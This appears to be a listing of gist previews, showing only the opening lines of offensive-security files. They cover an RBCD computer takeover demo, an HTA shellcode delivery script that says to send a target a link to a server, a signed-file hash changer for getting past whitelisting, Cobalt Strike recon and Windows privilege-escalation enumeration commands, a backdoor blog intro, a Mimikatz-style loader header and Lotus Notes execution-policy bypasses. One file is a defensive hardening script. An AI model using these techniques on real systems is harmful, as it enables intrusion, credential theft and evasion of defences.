rbcd_demo.ps1
# import the necessary toolsets | |
Import-Module .\powermad.ps1 | |
Import-Module .\powerview.ps1 | |
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
whoami | |
# the target computer object we're taking over | |
$TargetComputer = "primary.testlab.local" |
windows_hardening.cmd
:: | |
::####################################################################### | |
:: | |
:: Change file associations to protect against common ransomware attacks | |
:: Note that if you legitimately use these extensions (for example .bat), you will now need to execute them manually from cmd or PowerShell.
:: Alternatively, you can right-click on them and choose 'Run as Administrator', but make sure it is a script you actually want to run :)
:: --------------------- | |
ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" | |
ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" | |
ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" |
Copy-AuthenticodeSignedFile.ps1
function Copy-AuthenticodeSignedFile { | |
<# | |
.SYNOPSIS | |
Creates a copy of an Authenticode-signed PowerShell file that has a unique file hash but retains its valid signature. | |
.DESCRIPTION | |
Copy-AuthenticodeSignedFile creates a copy of an Authenticode-signed PowerShell file that has a unique file hash but retains its valid signature. This is used to bypass application whitelisting hash-based blacklist rules. |
cobaltstrike_sa.txt
Windows version: | |
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion | |
Users who have authed to the system: | |
ls C:\Users\ | |
System env variables: | |
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment | |
Saved outbound RDP connections: |
TestMSHTAShellcodeDelivery.ps1
<# | |
Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta | |
To change your server, simply find and replace 192.168.1.1 with your server in the code. | |
#> | |
<# | |
Moving credits for CACTUSTORCH here.
I was in escape-sequence hell ;-)
' ( ) ( ) |
blog.txt
From the inside out, a minimalist backdoor. | |
I'm a pretty big fan of simple and elegant. In this gist blog, I'll show you a very simple way to maintain access to a remote system that is behind a firewall, NAT and VPN.
In this example we will use three tools:
1. Node | |
2. PowerShell | |
3. LocalTunnel | |
While I have a full, compact, custom version, I will not be releasing it.
initial.cna
# | |
# Demonstrate how to queue tasks to execute with each checkin... | |
# | |
# | |
# yield tells a function to pause and return a value. The next time the same instance of the
# function is called, it resumes just after the point where it last yielded.
# | |
sub stuffToDo { | |
# Tasks for first checkin |
windows_privesc
// What system are we connected to? | |
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" | |
// Get the hostname and username (if available) | |
hostname | |
echo %username% | |
// Get users | |
net users | |
net user [username] |
katz.cs
using System; | |
using System.IO; | |
using System.Text; | |
using System.IO.Compression; | |
using System.EnterpriseServices; | |
using System.Collections.Generic; | |
using System.Runtime.InteropServices; | |
using System.Security.Cryptography; | |
LotusNotes Running PowerShell Code
"C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe" "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } | |
NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } | |
MD5 hashes of each binary (prepare for the onslaught of MD5 naysayers):
Notes.exe — 8f633ef1e1147637c25dd917909cd361 | |
NLNOTES.EXE — 3586b9069a1d4e1c63d9c9cf95cf4126 |